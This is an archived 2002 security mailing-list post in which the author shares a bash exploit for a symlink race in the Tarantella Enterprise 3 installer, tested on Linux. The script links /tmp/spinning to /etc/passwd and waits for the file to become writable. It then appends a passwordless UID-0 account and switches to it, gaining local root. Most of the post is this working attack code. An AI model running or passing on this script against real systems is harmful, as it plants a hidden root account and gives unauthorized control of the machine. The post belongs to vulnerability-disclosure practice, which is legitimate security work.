Exploit for Tarantella Enterprise installation (bid 4115)

From: Larry W. Cashdollar (lwcat_private)
Date: Sun Feb 24 2002 - 05:59:38 PST

Next message: Chris Bisnett: "Re: Re: Remote crashes in Yahoo messenger"

Previous message: Brian McWilliams: "Re: Windows Media Player executes WMF content in .MP3 files."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Had some idle time and wrote this, tested under Linux.



#!/bin/bash
#Larry W. Cashdollar  lwcat_private
#http://vapid.dhs.org
#Tarantella Enterprise 3 symlink local root Installation exploit
#For educational purposes only.
#tested on Linux.  run and wait.


echo "Creating symlink."

/bin/ln -s /etc/passwd /tmp/spinning

echo "Waiting for tarantella installation."

while true
do
echo -n .
if [ -w /etc/passwd ]
then
	echo "tarexp::0:0:Tarantella Exploit:/:/bin/bash" >> /etc/passwd
        su - tarexp
        exit
fi
done

Next message: Chris Bisnett: "Re: Re: Remote crashes in Yahoo messenger"
Previous message: Brian McWilliams: "Re: Windows Media Player executes WMF content in .MP3 files."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Feb 25 2002 - 16:29:12 PST